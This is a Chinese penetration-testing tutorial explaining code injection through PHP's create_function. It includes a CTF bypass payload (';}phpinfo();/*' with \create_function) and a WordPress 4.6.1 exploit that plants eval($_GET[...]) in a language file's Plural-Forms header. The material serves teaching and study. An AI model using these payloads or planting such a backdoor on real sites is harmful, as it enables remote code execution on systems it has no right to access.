渗透测试
从本地到WordPress代码注入
2021-09-18 06:02

什么是create_function?

版本影响:

注意:create_function在PHP7.2.0之后被废弃,因此该函数的适用范围在PHP 4 >= 4.0.1、PHP 5、 PHP 7<=7.2.0

简单讲解:

首先还是先看PHP手册,PHP官方对create_function是这么定义的:

image-20210915190613958

首先该函数有两个参数,一个是函数参数,另一个是函数主体代码,并且该函数的范围值即为函数名

举个例子:

<?php
$Lxxx = create_function('$str' , 'echo $str;phpinfo();');
echo $Lxxx;
echo "<br>";
echo $Lxxx("hello");

我们新建一个函数,名称为Lxxx,并且该函数的用途就是打印输出传入的字符串以及phpinfo页面

此时我们访问页面如下:

image-20210915192109796

可以看到,这个时候打印输出了hello以及phpinfo页面

除此之外,我们可以发现函数名是一串以lambda开头的字符串,也就是匿名函数。

这里我们可以发现,如果我们传入create_funtion中的第二个参数可控,那么我们就可以进行命令执行。

如何利用create_function()进行注入?

想要知道如何利用它进行注入,我们还得看看PHP官方手册是怎么说的:

image-20210915191830716

其实就是需要我们注意,这个函数本身就是在内部执行eval函数,

因此我们可以将上方的代码改写成另一种等价的形式:

<?php
function lambda_6($str){
   echo $str;
   phpinfo();
}
?>

那我们试想,既然这个函数参数可控,并且内部执行了eval函数,我们能否利用它进行RCE呢?

假设我们有以下代码:

<?php
$ctf = $_POST['ctf'];
if(!preg_match('/^[a-z0-9_]*$/i',$ctf)) {
   $ctf('',$_GET['Lxxx']);
}

其中传入的ctf参数不能以字母数字下划线开头,而Lxxx参数对于我们来说是完全可控的。

既然如此我们可以考虑使用create_function函数,但是这个时候会出现一个问题,传入的ctf参数不能以字母数字下划线开头,否则会产生匹配无法进入语句。

image-20210915193916031

问题一:

那么该如何又使用create_function函数,又不以字母开头呢?

分析一:

答案就是:使用反斜杠。

因为在PHP中默认的命名空间为\,也就是说,所有的原生函数以及各种原生类,都是在\这个命名空间下,平常我们使用的各种函数,默认都是直接写函数名,但是并没有管命名空间,不写\调用函数相当于是一个相对路径,同理,既然有相对路径,那么就会有绝对路径。也就是说当我们调用函数的时候,如果函数的命名空间在\下,我们使用\function_name()的方式调用函数,同样也是可以的

问题二:

对于下方代码,虽然参数可控,但是除了命令以外,还有}这个不可控字符,如果存在这个字符会报错,该怎么办?

<?php
function lambda_6($str){
   echo $str;
   phpinfo();
}
?>

分析二:

注入的时候在末尾添加注释符,将后面的内容注释掉即可。

也就是说,我们只需要传如下payload即可:

?Lxxx=;}phpinfo();/*
POSTDATA: ctf=\create_function

image-20210915194636478

WordPress中的create_function()注入

影响范围:

WordPress<=4.6.1

漏洞复现:

WordPress<=4.6.1的版本中,在wp-includes/pomo/translations.php文件中,有一处使用到了create_function函数

涉及到的代码如下:

/**
   * Makes a function, which will return the right translation index, according to the
   * plural forms header
   * @param int    $nplurals
   * @param string $expression
*/
function make_plural_form_function($nplurals, $expression) {
   $expression = str_replace('n', '$n', $expression);
   $func_body = "
       \$index = (int)($expression);
       return (\$index < $nplurals)? \$index : $nplurals - 1;";
   return create_function('$n', $func_body);
}

从注释中我们可以知道:这个函数是根据在目录wp-content/languages下语言文件的plural forms这个header来创建函数并返回

首先该函数返回值中可控参数为$func_body,而该参数由$nplurals参数决定$func_body,并且$nplurals由语言文件中的plural forms决定,因此,只需要能控制语言文件,即可控制整一个create_function函数

首先plural forms在如下位置:

image-20210915201407289

我们现在将第九行修改如下:

"Plural-Forms: nplurals=1; plural=n);}eval($_GET[Lxxx]);/*"

;}将前面的内容闭合,并且使用/*注释掉后面的代码

再将zh_CN.po文件重新编译生成zh_CN.mo,虽然提示有错,但是不影响我们编译。

image-20210915201849561

这个时候在主页传payload:

?Lxxx=phpinfo();

即可得到phpinfo页面,也就达成了RCE。


实验推荐:   Vulnhub渗透测试实战靶场WordPress


上一篇:Apache Dubbo反序列化漏洞
下一篇:没有了
版权所有 合天智汇信息技术有限公司 2013-2021 湘ICP备2024089852号-1
Copyright © 2013-2020 Heetian Corporation, All rights reserved
4006-123-731